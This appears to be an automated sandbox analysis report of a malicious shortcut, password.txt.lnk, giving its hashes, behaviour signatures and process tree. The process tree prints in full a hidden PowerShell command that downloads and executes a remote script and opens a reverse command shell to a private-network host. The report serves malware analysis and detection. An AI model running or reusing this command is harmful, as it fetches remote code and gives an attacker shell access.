Analysis
-
max time kernel
1579s -
max time network
1578s -
platform
windows7_x64 -
resource
win7v20201028 -
submitted
15-01-2021 21:00
Static task
static1
Behavioral task
behavioral1
Sample
password.txt.lnk
Resource
win7v20201028
0 signatures
0 seconds
General
-
Target
password.txt.lnk
-
Size
701B
-
MD5
954d37bb7d20be351e2aeb89ba70a79c
-
SHA1
eca297fe4ad255ea9bd53294a3da3c449c17551f
-
SHA256
e927ad9f7f2787687004afe8687f28409d282f4a63d8840661345126c7b8f14e
-
SHA512
37cc8f55ffa4c2e9ad65e7afaa82d726ec811e521eb9771300d066f600348ba5fbf5771f834ae9dbe4df0e2dc7511b4e0d741c164315327333812181ff37cf67
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://192.168.5.128:8000/svchost.ps1
Signatures
-
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 2024 powershell.exe 2024 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2024 powershell.exe -
Suspicious use of WriteProcessMemory 9 IoCs
Processes:
cmd.execmd.exepowershell.exedescription pid process target process PID 1204 wrote to memory of 2016 1204 cmd.exe cmd.exe PID 1204 wrote to memory of 2016 1204 cmd.exe cmd.exe PID 1204 wrote to memory of 2016 1204 cmd.exe cmd.exe PID 2016 wrote to memory of 2024 2016 cmd.exe powershell.exe PID 2016 wrote to memory of 2024 2016 cmd.exe powershell.exe PID 2016 wrote to memory of 2024 2016 cmd.exe powershell.exe PID 2024 wrote to memory of 1520 2024 powershell.exe svchost.exe PID 2024 wrote to memory of 1520 2024 powershell.exe svchost.exe PID 2024 wrote to memory of 1520 2024 powershell.exe svchost.exe
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\password.txt.lnk1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell -w hidden -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.5.128:8000/svchost.ps1');svchost -c 192.168.5.128 -p 9999 -e cmd"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -w hidden -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.5.128:8000/svchost.ps1');svchost -c 192.168.5.128 -p 9999 -e cmd"3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe" -c 192.168.5.128 -p 9999 -e cmd4⤵
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/1520-10-0x0000000000000000-mapping.dmp
-
memory/2016-2-0x0000000000000000-mapping.dmp
-
memory/2024-3-0x0000000000000000-mapping.dmp
-
memory/2024-4-0x000007FEF5260000-0x000007FEF5C4C000-memory.dmpFilesize
9.9MB
-
memory/2024-5-0x0000000002410000-0x0000000002411000-memory.dmpFilesize
4KB
-
memory/2024-6-0x000000001AC10000-0x000000001AC11000-memory.dmpFilesize
4KB
-
memory/2024-7-0x0000000002650000-0x0000000002651000-memory.dmpFilesize
4KB
-
memory/2024-8-0x00000000025B0000-0x00000000025B1000-memory.dmpFilesize
4KB
-
memory/2024-9-0x000000001B640000-0x000000001B641000-memory.dmpFilesize
4KB